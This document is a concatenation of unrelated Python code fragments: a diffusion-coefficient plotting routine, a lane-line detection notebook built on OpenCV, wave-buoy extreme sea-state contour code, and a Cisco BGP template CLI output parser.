coefficient["{} Perpendicular Diffusion std".format(sp)] = coefficient[perp_col_str].std(axis=1)
# Save the updated dataframe
vacf.dataframe.to_csv(vacf.filename_csv, index=False, encoding='utf-8')
# Endif magnetized.
coefficient.columns = pd.MultiIndex.from_tuples([tuple(c.split("_")) for c in coefficient.columns])
# Save the coefficient's data
coefficient.to_hdf(
os.path.join(vacf.saving_dir, 'Diffusion_' + vacf.job_id + '.h5'),
mode='w',
key='diffusion')
if plot or figname:
# Make the plot
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(16, 7))
# index axes
ax3 = ax1.twiny()
ax4 = ax2.twiny()
# extra space for the second axis at the bottom
fig.subplots_adjust(bottom=0.2)
if not params.magnetized:
for isp, sp in enumerate(params.species_names):
sp_vacf_str = "{} ".format(sp) + vacf_str
acf_avg = vacf.dataframe[(sp_vacf_str, "Total", "Mean")]
acf_std = vacf.dataframe[(sp_vacf_str, "Total", "Std")]
d_avg = coefficient[("{} Diffusion".format(sp), "Mean")]
d_std = coefficient[("{} Diffusion".format(sp), "Std")]
# Calculate axis multipliers and labels
xmul, ymul, _, _, xlbl, ylbl = obs.plot_labels(time, d_avg, "Time", "Diffusion", vacf.units)
ax1.plot(xmul * time, acf_avg / acf_avg[0], label=r'$D_{' + sp + '}$')
ax1.fill_between(
xmul * time,
(acf_avg + acf_std) / (acf_avg[0] + acf_std[0]),
(acf_avg - acf_std) / (acf_avg[0] - acf_std[0]), alpha=0.2)
ax2.plot(xmul * time, ymul * d_avg, label=r'$D_{' + sp + '}$')
ax2.fill_between(xmul * time, ymul * (d_avg + d_std), | |
- y1) * (y2 - y1) + (x2 - x1) * (x2 - x1)
# print("line: slope={:.2f}, x_mid={:.2f}, intercept={:.2f}:({:.2f},{:.2f})-({:.2f},{:.2f})".format(
# slope, x_mid, intercept, x1, y1, x2, y2))
if (slope >= min_pos_slope) and (slope <= max_pos_slope):
pos_slopes.append(slope)
pos_intercepts.append(intercept)
pos_sq_distances[pos_len] = sq_distance
pos_x_mids.append(x_mid)
pos_len += 1
# print('Appended slope = {:.2f}'.format(slope))
elif (slope <= max_neg_slope) and (slope >= min_neg_slope):
neg_slopes.append(slope)
neg_intercepts.append(intercept)
neg_sq_distances[neg_len] = sq_distance
neg_x_mids.append(x_mid)
neg_len += 1
# print('Appended slope = {:.2f}'.format(slope))
else:
# print('Excluded line with slope = {:.2f}'.format(slope))
pass
# print('Pos slopes:', pos_slopes)
# print('Pos x_mids:', pos_x_mids)
# print('Pos intercepts:', pos_intercepts)
# print('Neg slopes:', neg_slopes)
# print('Neg x_mids:', neg_x_mids)
# print('Neg intercepts:', neg_intercepts)
pos_len = len(pos_slopes)
y1 = img.shape[0] - 1
y2 = int(img.shape[0]*5/8)
if pos_len > 0:
# # # pos_median_index = np.argsort(pos_slopes)[len(pos_slopes) // 2]
# # pos_mid1 = pos_slopes.index(np.percentile(pos_slopes, 25, interpolation='nearest'))
# # pos_mid2 = pos_slopes.index(np.percentile(pos_slopes, 75, interpolation='nearest'))
# pos_sq_distance_max_index = pos_sq_distances.argmax()
# # # pos_slope = pos_slopes[neg_median_index]
# # pos_slope = np.average(pos_slopes[pos_mid1:pos_mid2+1])
# pos_slope = pos_slopes[pos_sq_distance_max_index]
# # # pos_intercept = pos_intercepts[pos_median_index]
# # pos_intercept = np.average(pos_intercepts[pos_mid1:pos_mid2+1])
# pos_intercept = pos_intercepts[pos_sq_distance_max_index]
pos_slope = np.average(pos_slopes)
pos_x_mid = np.average(pos_x_mids)
# pos_intercept = np.average(pos_intercepts)
pos_slope, pos_x_mid = moving_averages(pos_slope, pos_x_mid, 'pos')
pos_intercept = y_mid - pos_slope * pos_x_mid
x1 = int((y1 - pos_intercept)/pos_slope)
x2 = int((y2 - pos_intercept)/pos_slope)
lines_new.append([[x1, y1, x2, y2]])
# print("pos laneline: slope={:.2f}, x_mid={:.2f}, intercept={:.2f}:({:.2f},{:.2f})-({:.2f},{:.2f})".format(
# pos_slope, pos_x_mid, pos_intercept, x1,y1,x2,y2))
neg_len = len(neg_slopes)
if neg_len > 0:
# # # neg_median_index = np.argsort(neg_slopes)[len(neg_slopes) // 2]
# # neg_mid1 = neg_slopes.index(np.percentile(neg_slopes, 25, interpolation='nearest'))
# # neg_mid2 = neg_slopes.index(np.percentile(neg_slopes, 75, interpolation='nearest'))
# neg_sq_distance_max_index = neg_sq_distances.argmax()
# # # neg_slope = neg_slopes[neg_median_index]
# # neg_slope = np.average(neg_slopes[neg_mid1:neg_mid2+1])
# neg_slope = neg_slopes[neg_sq_distance_max_index]
# # # neg_intercept = neg_intercepts[neg_median_index]
# # neg_intercept = np.average(neg_slopes[neg_mid1:neg_mid2+1])
# neg_intercept = neg_intercepts[neg_sq_distance_max_index]
neg_slope = np.average(neg_slopes)
neg_x_mid = np.average(neg_x_mids)
neg_slope, neg_x_mid = moving_averages(neg_slope, neg_x_mid, 'neg')
# neg_intercept = np.average(neg_intercepts)
neg_intercept = y_mid - neg_slope * neg_x_mid
x1 = int((y1 - neg_intercept)/neg_slope)
x2 = int((y2 - neg_intercept)/neg_slope)
lines_new.append([[x1, y1, x2, y2]])
# print("neg laneline: slope={:.2f}, x_mid={:.2f}, intercept={:.2f}:({:.2f},{:.2f})-({:.2f},{:.2f})".format(
# neg_slope, neg_x_mid, neg_intercept, x1,y1,x2,y2))
draw_lines(line_img, lines_new)
# cv2.imshow('before_lines', img)
# temp = np.zeros((img.shape[0], img.shape[1], 3), dtype=np.uint8)
# draw_lines(temp, lines)
# cv2.imshow('lines_original', temp)
# temp2 = np.zeros((img.shape[0], img.shape[1], 3), dtype=np.uint8)
# draw_lines(temp2, lines_new)
# cv2.imshow('lane_lines', temp2)
# cv2.waitKey(1000)
return line_img
# Python 3 has support for cool math symbols.
def weighted_img(img, initial_img, α=0.8, β=1., γ=0.):
"""
`img` is the output of the hough_lines(), An image with lines drawn on it.
Should be a blank image (all black) with lines drawn on it.
`initial_img` should be the image before any processing.
The result image is computed as follows:
initial_img * α + img * β + γ
NOTE: initial_img and img must be the same shape!
"""
return cv2.addWeighted(initial_img, α, img, β, γ)
# ## Test Images
#
# Build your pipeline to work on the images in the directory "test_images"
# **You should make sure your pipeline works well on these images before you try the videos.**
# In[4]:
import os
os.listdir("test_images/")
# ## Build a Lane Finding Pipeline
#
#
# Build the pipeline and run your solution on all test_images. Make copies into the `test_images_output` directory, and you can use the images in your writeup report.
#
# Try tuning the various parameters, especially the low and high Canny thresholds as well as the Hough lines parameters.
# In[8]:
# TODO: Build your pipeline that will draw lane lines on the test_images
# then save them to the test_images_output directory.
def lane_finding_pipeline(image):
# get gray scale first since all processing steps are on grayscale only
gray = grayscale(image)
# Define a kernel size and apply Gaussian smoothing
kernel_size = 5
blur_gray = gaussian_blur(gray, kernel_size)
# Define our parameters for Canny and apply
low_threshold = 60
high_threshold = 120
edges = canny(blur_gray, low_threshold, high_threshold)
# cv2.imshow('edges', edges)
# cv2.waitKey(1000)
# Next we'll create a masked edges image using cv2.fillPoly()
mask = np.zeros_like(edges)
ignore_mask_color = 255
# This time we are defining a four sided polygon to mask
imshape = image.shape
vertices = np.array([[(int(imshape[1]*1/16), int(imshape[0])),
(int(imshape[1] * 7 / 16), int(imshape[0] * 5 / 8)),
(int(imshape[1] * 9 / 16), int(imshape[0] * 5 / 8)),
(int(imshape[1]*15/16), int(imshape[0]))]],
dtype=np.int32)
cv2.fillPoly(mask, vertices, ignore_mask_color)
# cv2.imshow('mask', mask)
# cv2.waitKey(1000)
masked_edges = cv2.bitwise_and(edges, mask)
# cv2.imshow('masked_edges', masked_edges)
# cv2.waitKey(1000)
# Define the Hough transform parameters
# Make a blank the same size as our image to draw on
rho = 2
theta = np.pi / 180
threshold = 50
min_line_length = 25
max_line_gap = 100
# Run Hough on edge detected image
line_image = hough_lines(masked_edges, rho, theta, threshold,
min_line_length, max_line_gap)
# cv2.imshow('line_image', line_image)
# cv2.waitKey(1000)
# # Create a "color" binary image to combine with line image
# color_edges = np.dstack((masked_edges, masked_edges, masked_edges))
# cv2.imshow('color_edges', color_edges)
# cv2.waitKey(1000)
# Draw the lines on the edge image
combo = weighted_img(line_image, image, 0.8, 1, 0)
# cv2.imshow('combo', combo)
# cv2.waitKey(1000)
return combo
IMAGE_DIR = "test_images/"
for imagefile in os.listdir(IMAGE_DIR):
if imagefile.split('.')[-1] == 'jpg':
image = cv2.imread(os.path.join(IMAGE_DIR, imagefile))
cv2.imshow('image', image)
result = lane_finding_pipeline(image)
cv2.imshow('result', result)
cv2.waitKey(3000)
clear_moving_averages()
# ## Test on Videos
#
# You know what's cooler than drawing lanes over images? Drawing lanes over video!
#
# We can test our solution on two provided videos:
#
# `solidWhiteRight.mp4`
#
# `solidYellowLeft.mp4`
#
# **Note: if you get an import error when you run the next cell, try changing your kernel (select the Kernel menu above --> Change Kernel). Still have problems? Try relaunching Jupyter Notebook from the terminal prompt. Also, consult the forums for more troubleshooting tips.**
#
# **If you get an error that looks like this:**
# ```
# NeedDownloadError: Need ffmpeg exe.
# You can download it by calling:
# imageio.plugins.ffmpeg.download()
# ```
# **Follow the instructions in the error message and check out [this forum post](https://discussions.udacity.com/t/project-error-of-test-on-videos/274082) for more troubleshooting tips across operating systems.**
# In[ ]:
# Import everything needed to edit/save/watch video clips
from moviepy.editor import VideoFileClip
from IPython.display import HTML
# In[ ]:
def process_image(image):
# NOTE: The output you return should be a color image (3 channel) for processing video below
# TODO: put your pipeline here,
# you should return the final output (image where lines are drawn on lanes)
result = lane_finding_pipeline(image)
return result
# Let's try the one with the solid white lane on the right first ...
# In[ ]:
white_output = 'test_videos_output/solidWhiteRight.mp4'
## To speed up the testing process you may want to try your pipeline on a shorter subclip of the video
## To do so add .subclip(start_second,end_second) to the end of the line below
## Where start_second and end_second are integer values representing the start and end of the subclip
## You may also uncomment the following line for a subclip of the first 5 seconds
##clip1 = VideoFileClip("test_videos/solidWhiteRight.mp4").subclip(0,5)
clip1 = VideoFileClip("test_videos/solidWhiteRight.mp4")
white_clip = clip1.fl_image(process_image) # NOTE: this function expects color images!!
clear_moving_averages()
class timeit():
from datetime import datetime
def __enter__(self):
self.tic = self.datetime.now()
def __exit__(self, *args, **kwargs):
print('runtime: {}'.format(self.datetime.now() - self.tic))
# get_ipython().magic(u'time white_clip.write_videofile(white_output, audio=False)')
with timeit():
white_clip.write_videofile(white_output, audio=False)
# Play the video inline, or if you prefer find the video in your filesystem (should be in the same directory) and play it in your video player of choice.
# In[ ]:
HTML("""
<video width="960" height="540" controls>
<source src="{0}">
</video>
""".format(white_output))
# ## Improve the draw_lines() function
#
# **At this point, if you were successful with making the pipeline and tuning parameters, you probably have the Hough line segments drawn onto the road, but what about identifying the full extent of the lane and marking it clearly as in the example video (P1_example.mp4)? Think about defining a line to run the full length of the visible lane based on the line segments you identified with the Hough Transform. As mentioned previously, try to average and/or extrapolate the line segments you've detected to map out the full extent of the lane lines. You can see an example of the result you're going for in the video "P1_example.mp4".**
#
# **Go back and modify your draw_lines function accordingly and try re-running your pipeline. The new output should draw a single, solid line over the left lane line and a single, solid line | |
maxHs:
break
startingPoint = sortedTBuoy.T[0]
hsBin1.append(sortedTBuoy.Hs[0])
tBin1.append(sortedTBuoy.T[0])
while True:
tempNextBinTs = sortedTBuoy.T[sortedTBuoy.T < startingPoint + tStepSize]
tempNextBinHs = sortedTBuoy.Hs[sortedTBuoy.T < startingPoint + tStepSize]
nextBinTs = tempNextBinTs[tempNextBinTs > startingPoint]
nextBinHs = tempNextBinHs[tempNextBinTs > startingPoint]
try:
nextHs = min(nextBinHs)
nextT = nextBinTs[nextBinHs.argmin(axis=0)]
hsBin1.append(nextHs)
tBin1.append(nextT)
startingPoint = nextT
except ValueError:
startingPoint += tStepSize
break
if nextHs == minHs:
break
startingPoint = sortedHsBuoy.Hs[sortedHsBuoy.T.argmax(axis=0)]
hsBin3.append(sortedHsBuoy.Hs[sortedHsBuoy.T.argmax(axis=0)])
tBin3.append(sortedHsBuoy.T[sortedHsBuoy.T.argmax(axis=0)])
while True:
tempNextBinTs = sortedHsBuoy.T[sortedHsBuoy.Hs < startingPoint + hsStepSize]
tempNextBinHs = sortedHsBuoy.Hs[sortedHsBuoy.Hs < startingPoint + hsStepSize]
nextBinTs = tempNextBinTs[tempNextBinHs > startingPoint]
nextBinHs = tempNextBinHs[tempNextBinHs > startingPoint]
try:
nextT = max(nextBinTs)
nextHs = nextBinHs[nextBinTs.argmax(axis=0)]
if nextHs not in hsBin4 and nextHs not in hsBin1:
hsBin3.append(nextHs)
tBin3.append(nextT)
startingPoint = nextHs
except ValueError:
startingPoint += hsStepSize
break
if nextHs == maxHs:
break
startingPoint = sortedHsBuoy.Hs[sortedHsBuoy.T.argmax(axis=0)]
while True:
tempNextBinTs = sortedHsBuoy.T[sortedHsBuoy.Hs > startingPoint - hsStepSize]
tempNextBinHs = sortedHsBuoy.Hs[sortedHsBuoy.Hs > startingPoint - hsStepSize]
nextBinTs = tempNextBinTs[tempNextBinHs < startingPoint]
nextBinHs = tempNextBinHs[tempNextBinHs < startingPoint]
try:
nextT = max(nextBinTs)
nextHs = nextBinHs[nextBinTs.argmax(axis=0)]
if nextHs not in hsBin1 and nextHs not in hsBin4:
hsBin2.append(nextHs)
tBin2.append(nextT)
startingPoint = nextHs
except ValueError:
startingPoint = startingPoint - hsStepSize
break
if nextHs == minHs:
break
hsBin2 = hsBin2[::-1] # Reverses the order of the array
tBin2 = tBin2[::-1]
hsBin4 = hsBin4[::-1] # Reverses the order of the array
tBin4 = tBin4[::-1]
dataBoundryHs = np.concatenate((hsBin1,hsBin2,hsBin3,hsBin4),axis = 0)
dataBoundryT = np.concatenate((tBin1,tBin2,tBin3,tBin4),axis = 0)
dataBoundryHs = dataBoundryHs[::-1]
dataBoundryT = dataBoundryT[::-1]
return(dataBoundryHs, dataBoundryT)
def __getCopulaParams(self,n_size,bin_1_limit,bin_step):
sorted_idx = sorted(range(len(self.buoy.Hs)),key=lambda x:self.buoy.Hs[x])
Hs = self.buoy.Hs[sorted_idx]
T = self.buoy.T[sorted_idx]
# Estimate parameters for Weibull distribution for component 1 (Hs) using MLE
# Estimate parameters for Lognormal distribution for component 2 (T) using MLE
para_dist_1=stats.exponweib.fit(Hs,floc=0,fa=1)
para_dist_2=stats.norm.fit(np.log(T))
# Binning
ind = np.array([])
ind = np.append(ind,sum(Hs_val <= bin_1_limit for Hs_val in Hs))
# Make sure first bin isn't empty or too small to avoid errors
while ind == 0 or ind < n_size:
ind = np.array([])
bin_1_limit = bin_1_limit + bin_step
ind = np.append(ind,sum(Hs_val <= bin_1_limit for Hs_val in Hs))
for i in range(1,200):
bin_i_limit = bin_1_limit+bin_step*(i)
ind = np.append(ind,sum(Hs_val <= bin_i_limit for Hs_val in Hs))
if (ind[i-0]-ind[i-1]) < n_size:
break
# Parameters for conditional distribution of T|Hs for each bin
num=len(ind) # num+1: number of bins
para_dist_cond = []
hss = []
para_dist_cond.append(stats.norm.fit(np.log(T[range(0,int(ind[0]))]))) # parameters for first bin
hss.append(np.mean(Hs[range(0,int(ind[0])-1)])) # mean of Hs (component 1 for first bin)
para_dist_cond.append(stats.norm.fit(np.log(T[range(0,int(ind[1]))]))) # parameters for second bin
hss.append(np.mean(Hs[range(0,int(ind[1])-1)])) # mean of Hs (component 1 for second bin)
for i in range(2,num):
para_dist_cond.append(stats.norm.fit(np.log(T[range(int(ind[i-2]),int(ind[i]))])));
hss.append(np.mean(Hs[range(int(ind[i-2]),int(ind[i]))]))
# Estimate coefficient using least square solution (mean: third order, sigma: 2nd order)
para_dist_cond.append(stats.norm.fit(np.log(T[range(int(ind[num-2]),int(len(Hs)))]))); # parameters for last bin
hss.append(np.mean(Hs[range(int(ind[num-2]),int(len(Hs)))])) # mean of Hs (component 1 for last bin)
para_dist_cond = np.array(para_dist_cond)
hss = np.array(hss)
phi_mean = np.column_stack((np.ones(num+1),hss[:],hss[:]**2,hss[:]**3))
phi_std = np.column_stack((np.ones(num+1),hss[:],hss[:]**2))
# Estimate coefficients of mean of Ln(T|Hs)(vector 4x1) (cubic in Hs)
mean_cond = np.linalg.lstsq(phi_mean,para_dist_cond[:,0])[0]
# Estimate coefficients of standard deviation of Ln(T|Hs) (vector 3x1) (quadratic in Hs)
std_cond = np.linalg.lstsq(phi_std,para_dist_cond[:,1])[0]
return para_dist_1, para_dist_2, mean_cond, std_cond
def __getNonParaCopulaParams(self,Ndata, max_T, max_Hs):
sorted_idx = sorted(range(len(self.buoy.Hs)),key=lambda x:self.buoy.Hs[x])
Hs = self.buoy.Hs[sorted_idx]
T = self.buoy.T[sorted_idx]
# Calcualte KDE bounds (this may be added as an input later)
min_limit_1 = 0
max_limit_1 = max_Hs
min_limit_2 = 0
max_limit_2 = max_T
# Discretize for KDE
pts_hs = np.linspace(min_limit_1, max_limit_1, self.Ndata)
pts_t = np.linspace(min_limit_2, max_limit_2, self.Ndata)
# Calculate optimal bandwidth for T and Hs
sig = robust.scale.mad(T)
num = float(len(T))
bwT = sig*(4.0/(3.0*num))**(1.0/5.0)
sig = robust.scale.mad(Hs)
num = float(len(Hs))
bwHs = sig*(4.0/(3.0*num))**(1.0/5.0)
# Nonparametric PDF for T
temp = sm.nonparametric.KDEUnivariate(T)
temp.fit(bw = bwT)
f_t = temp.evaluate(pts_t)
# Nonparametric CDF for Hs
temp = sm.nonparametric.KDEUnivariate(Hs)
temp.fit(bw = bwHs)
tempPDF = temp.evaluate(pts_hs)
F_hs = tempPDF/sum(tempPDF)
F_hs = np.cumsum(F_hs)
# Nonparametric CDF for T
F_t = f_t/sum(f_t)
F_t = np.cumsum(F_t)
nonpara_dist_1 = np.transpose(np.array([pts_hs, F_hs]))
nonpara_dist_2 = np.transpose(np.array([pts_t, F_t]))
nonpara_pdf_2 = np.transpose(np.array([pts_t, f_t]))
return nonpara_dist_1, nonpara_dist_2, nonpara_pdf_2
def __gumbelCopula(self, u, alpha):
''' Calculates the Gumbel copula density
Parameters
----------
u: np.array
Vector of equally spaced points between 0 and twice the
maximum value of T.
alpha: float
Copula parameter. Must be greater than or equal to 1.
Returns
-------
y: np.array
Copula density function.
'''
#Ignore divide by 0 warnings and resulting NaN warnings
np.seterr(all='ignore')
v = -np.log(u)
v = np.sort(v, axis=0)
vmin = v[0, :]
vmax = v[1, :]
nlogC = vmax * (1 + (vmin / vmax) ** alpha) ** (1 / alpha)
y = (alpha - 1 +nlogC)*np.exp(-nlogC+np.sum((alpha-1)*np.log(v)+v, axis =0) +(1-2*alpha)*np.log(nlogC))
np.seterr(all='warn')
return(y)
class PCA(EA):
def __init__(self, buoy, size_bin=250.):
'''
Create a PCA EA class for a buoy object. Contours generated under this
class will use principal component analysis (PCA) with improved
distribution fitting (Eckert et. al 2015) and the I-FORM.
Parameters
___________
size_bin : float
chosen bin size
buoy : NDBCData
ESSC.Buoy Object
'''
self.method = "Principle component analysis"
self.buoy = buoy
if size_bin > len(buoy.Hs)*0.25:
self.size_bin = len(buoy.Hs)*0.25
print(round(len(buoy.Hs)*0.25,2),'is the max bin size for this buoy. The bin size has been set to this amount.')
else:
self.size_bin = size_bin
self.Hs_ReturnContours = None
self.Hs_SampleCA = None
self.Hs_SampleFSS = None
self.T_ReturnContours = None
self.T_SampleCA = None
self.T_SampleFSS = None
self.Weight_points = None
self.coeff, self.shift, self.comp1_params, self.sigma_param, self.mu_param = self.__generateParams(self.size_bin)
def __generateParams(self, size_bin=250.0):
pca = skPCA(n_components=2)
pca.fit(np.array((self.buoy.Hs - self.buoy.Hs.mean(axis=0), self.buoy.T - self.buoy.T.mean(axis=0))).T)
coeff = abs(pca.components_) # Apply correct/expected sign convention
coeff[1, 1] = -1.0 * coeff[1, 1] # Apply correct/expected sign convention
Comp1_Comp2 = np.dot (np.array((self.buoy.Hs, self.buoy.T)).T, coeff)
shift = abs(min(Comp1_Comp2[:, 1])) + 0.1 # Calculate shift
shift = abs(min(Comp1_Comp2[:, 1])) + 0.1 # Calculate shift
# Apply shift to Component 2 to make all values positive
Comp1_Comp2[:, 1] = Comp1_Comp2[:, 1] + shift
Comp1_Comp2_sort = Comp1_Comp2[Comp1_Comp2[:, 0].argsort(), :]
# Fitting distribution of component 1
comp1_params = stats.invgauss.fit(Comp1_Comp2_sort[:, 0], floc=0)
n_data = len(self.buoy.Hs) # Number of observations
edges = np.hstack((np.arange(0, size_bin * np.ceil(n_data / size_bin),
size_bin), n_data + 1))
ranks = np.arange(n_data)
hist_count, _ = np.histogram(ranks, bins=edges)
bin_inds = np.digitize(ranks, bins=edges) - 1
Comp2_bins_params = np.zeros((2, int(max(bin_inds) + 1)))
Comp1_mean = np.array([])
for bin_loop in range(np.max(bin_inds) + 1):
mask_bins = bin_inds == bin_loop # Find location of bin values
Comp2_bin = np.sort(Comp1_Comp2_sort[mask_bins, 1])
Comp1_mean = np.append(Comp1_mean,
np.mean(Comp1_Comp2_sort[mask_bins, 0]))
# Calcualte normal distribution parameters for C2 in each bin
Comp2_bins_params[:, bin_loop] = np.array(stats.norm.fit(Comp2_bin))
mu_param, pcov = optim.curve_fit(self.__mu_fcn,
Comp1_mean.T, Comp2_bins_params[0, :])
sigma_param = self.__sigma_fits(Comp1_mean, Comp2_bins_params[1, :])
return coeff, shift, comp1_params, sigma_param, mu_param
def _saveParams(self, groupObj):
if('nb_steps' in groupObj):
groupObj['nb_steps'][...] = self.nb_steps
else:
groupObj.create_dataset('nb_steps', data=self.nb_steps)
if('time_r' in groupObj):
groupObj['time_r'][...] = self.time_r
else:
groupObj.create_dataset('time_r', data=self.time_r)
if('time_ss' in groupObj):
groupObj['time_ss'][...] = self.time_ss
else:
groupObj.create_dataset('time_ss', data=self.time_ss)
if('coeff' in groupObj):
groupObj['coeff'][...] = self.coeff
else:
groupObj.create_dataset('coeff', data=self.coeff)
if('shift' in groupObj):
groupObj['shift'][...] = self.shift
else:
groupObj.create_dataset('shift', data=self.shift)
if('comp1_params' in groupObj):
groupObj['comp1_params'][...] = self.comp1_params
else:
groupObj.create_dataset('comp1_params', data=self.comp1_params)
if('sigma_param' in groupObj):
groupObj['sigma_param'][...] = self.sigma_param
else:
groupObj.create_dataset('sigma_param', data=self.sigma_param)
if('mu_param' in groupObj):
groupObj['mu_param'][...] = self.mu_param
else:
groupObj.create_dataset('mu_param', data=self.mu_param)
def getContours(self, time_ss, time_r, nb_steps=1000):
'''WDRT Extreme Sea State PCA Contour function
This function calculates environmental contours of extreme sea states using
principal component analysis and the inverse first-order reliability
method.
Parameters
___________
time_ss : float
Sea state duration (hours) of measurements in input.
time_r : np.array
Desired return period (years) for calculation of environmental
contour, can be a scalar or a vector.
nb_steps : int
Discretization of the circle in the normal space used for
inverse FORM calculation.
Returns
-------
Hs_Return : np.array
Calculated Hs values along the contour boundary following
return to original input orientation.
T_Return : np.array
Calculated T values along the contour boundary following
return to original input orientation.
nb_steps : float
Discretization of the circle in the normal space
Example
-------
To | |
configured
m = p5.match(line)
if m:
password_text = m.groupdict()['password_text']
if flag:
parsed_dict['peer_session'][template_id]['inherited_session_commands']\
['password_text'] = password_text
else:
parsed_dict['peer_session'][template_id]['password_text'] = password_text
continue
# shutdown
m = p6.match(line)
if m:
if flag:
parsed_dict['peer_session'][template_id]['inherited_session_commands'] \
['shutdown'] = True
else:
parsed_dict['peer_session'][template_id]['shutdown'] = True
continue
# ebgp-multihop 254
m = p7.match(line)
if m:
ebgp_multihop_max_no = int(m.groupdict()['ebgp_multihop_max_no'])
if flag:
parsed_dict['peer_session'][template_id]['inherited_session_commands'] \
['ebgp_multihop_max_hop'] = ebgp_multihop_max_no
parsed_dict['peer_session'][template_id]['inherited_session_commands'] \
['ebgp_multihop_enable'] = True
else:
parsed_dict['peer_session'][template_id]['ebgp_multihop_max_hop'] = ebgp_multihop_max_no
parsed_dict['peer_session'][template_id]['ebgp_multihop_enable'] = True
continue
# update-source Loopback0
m = p8.match(line)
if m:
update_source = m.groupdict()['update_source']
if flag:
parsed_dict['peer_session'][template_id]['inherited_session_commands']\
['update_source'] = update_source
else:
parsed_dict['peer_session'][template_id]['update_source'] = update_source
continue
# transport connection-mode passive
m = p9.match(line)
if m:
transport_connection_mode = m.groupdict()['transport_connection_mode']
if flag:
parsed_dict['peer_session'][template_id]['inherited_session_commands'] \
['transport_connection_mode'] = transport_connection_mode
else:
parsed_dict['peer_session'][template_id]['transport_connection_mode'] \
= transport_connection_mode
continue
# description desc1!
m = p10.match(line)
if m:
description = m.groupdict()['desc']
if flag:
parsed_dict['peer_session'][template_id]['inherited_session_commands'] \
['description'] = description
else:
parsed_dict['peer_session'][template_id]['description'] \
= description
continue
# dont-capability-negotiate four-octets-as
m = p11.match(line)
if m:
if flag:
parsed_dict['peer_session'][template_id]['inherited_session_commands']\
['suppress_four_byte_as_capability'] = True
else:
parsed_dict['peer_session'][template_id]['suppress_four_byte_as_capability'] \
= True
continue
# timers 10 30
m = p12.match(line)
if m:
keepalive_interval = int(m.groupdict()['keepalive_interval'])
holdtime = int(m.groupdict()['holdtime'])
if flag:
parsed_dict['peer_session'][template_id]['inherited_session_commands']\
['keepalive_interval'] = keepalive_interval
parsed_dict['peer_session'][template_id]['inherited_session_commands']['holdtime'] \
= holdtime
else:
parsed_dict['peer_session'][template_id]['keepalive_interval'] \
= keepalive_interval
parsed_dict['peer_session'][template_id]['holdtime'] \
= holdtime
continue
# local-as 255
m = p13.match(line)
if m:
local_as_as_no = int(m.groupdict()['local_as_as_no'])
if flag:
parsed_dict['peer_session'][template_id]['inherited_session_commands']\
['local_as_as_no'] = local_as_as_no
else:
parsed_dict['peer_session'][template_id]['local_as_as_no'] = local_as_as_no
continue
# disable-connected-check
m = p14.match(line)
if m:
if flag:
parsed_dict['peer_session'][template_id]['inherited_session_commands']\
['disable_connected_check'] = True
else:
parsed_dict['peer_session'][template_id]['disable_connected_check'] = True
continue
# fall-over bfd
m = p15.match(line)
if m:
if flag:
parsed_dict['peer_session'][template_id]['inherited_session_commands']\
['fall_over_bfd'] = True
else:
parsed_dict['peer_session'][template_id]['fall_over_bfd'] = True
continue
# Inherited session commands:
m = p16.match(line)
if m:
if 'inherited_session_commands' not in parsed_dict['peer_session'][template_id]:
parsed_dict['peer_session'][template_id]['inherited_session_commands'] = {}
flag = True
continue
if parsed_dict:
for key, value in parsed_dict['peer_session'].items():
if 'inherited_session_commands' in parsed_dict['peer_session'][key]:
if not len(parsed_dict['peer_session'][key]['inherited_session_commands']):
del parsed_dict['peer_session'][key]['inherited_session_commands']
return parsed_dict
#-------------------------------------------------------------------------------
# ======================================================
# Schema for:
# * 'show ip bgp template peer-policy {template_name}'
# ======================================================
class ShowIpBgpTemplatePeerPolicySchema(MetaParser):
''' Schema for "show ip bgp template peer-policy {template_name}" '''
schema = {
'peer_policy':
{Any():
{Optional('local_policies'): str,
Optional('inherited_polices'): str,
Optional('local_disable_policies'): str,
Optional('inherited_disable_polices'): str,
Optional('allowas_in'): bool ,
Optional('allowas_in_as_number'): int,
Optional('as_override'): bool,
Optional('default_originate'): bool,
Optional('default_originate_route_map'): str,
Optional('route_map_name_in'): str,
Optional('route_map_name_out'): str,
Optional('maximum_prefix_max_prefix_no'): int,
Optional('maximum_prefix_threshold'): int,
Optional('maximum_prefix_restart'): int,
Optional('maximum_prefix_warning_only'): bool,
Optional('next_hop_self'): bool,
Optional('route_reflector_client'): bool,
Optional('send_community'): str,
Optional('soft_reconfiguration'): bool,
Optional('soo'): str,
Optional('index'): int,
Optional('inherited_policies'):
{Optional('allowas_in'): bool,
Optional('allowas_in_as_number'): int,
Optional('as_override'): bool,
Optional('default_originate'): bool,
Optional('default_originate_route_map'): str,
Optional('route_map_name_in'): str,
Optional('route_map_name_out'): str,
Optional('maximum_prefix_max_prefix_no'): int,
Optional('maximum_prefix_threshold'): int,
Optional('maximum_prefix_restart'): int,
Optional('maximum_prefix_warning_only'): bool,
Optional('next_hop_self'): bool,
Optional('route_reflector_client'): bool,
Optional('send_community'): str,
Optional('soft_reconfiguration'): bool,
Optional('soo'): str,
},
},
},
}
# ======================================================
# Parser for:
# * 'show ip bgp template peer-policy {template_name}'
# ======================================================
class ShowIpBgpTemplatePeerPolicy(ShowIpBgpTemplatePeerPolicySchema):
''' Parser for "show ip bgp template peer-policy {template_name}" '''
cli_command = ['show ip bgp template peer-policy {template_name}', 'show ip bgp template peer-policy']
def cli(self, template_name="", output=None):
# show ip bgp template peer-policy <WORD>
if output is None:
if template_name:
cmd = self.cli_command[0].format(template_name=template_name)
else:
cmd = self.cli_command[1]
out = self.device.execute(cmd)
else:
out = output
p1 = re.compile(r'^\s*Template:+(?P<template_id>[0-9\s\S\w]+),'
' +index:(?P<index>[0-9]+).$')
p2 = re.compile(r'^\s*Local +policies:+(?P<local_policies>0x[0-9A-F]+),'
' +Inherited +polices:+(?P<inherited_polices>0x[0-9A-F]+)$')
p3 = re.compile(r'^\s*Local +disable +policies:+(?P<local_disable_policies>0x[0-9A-F]+),'
' +Inherited +disable +policies:+(?P<inherited_disable_polices>0x[0-9A-F]+)$')
p4 = re.compile(r'^\s*Locally +configured +policies:$')
p5 = re.compile(r'^\s*route-map +(?P<remote_map_in>[0-9a-zA-Z]+) +in$')
p6 = re.compile(r'^\s*route-map +(?P<route_map_out>[0-9a-zA-Z]+) +out$')
p7 = re.compile(r'^\s*default-originate +route-map'
' +(?P<default_originate_route_map>[0-9a-zA-Z]+)$')
p8 = re.compile(r'^\s*soft-reconfiguration'
' +(?P<soft_reconfiguration>[a-zA-Z]+)$')
p9 = re.compile(r'^\s*maximum-prefix'
' +(?P<maximum_prefix_max_prefix_no>[0-9]+)'
' ?(?P<maximum_prefix_threshold>[0-9]+)?'
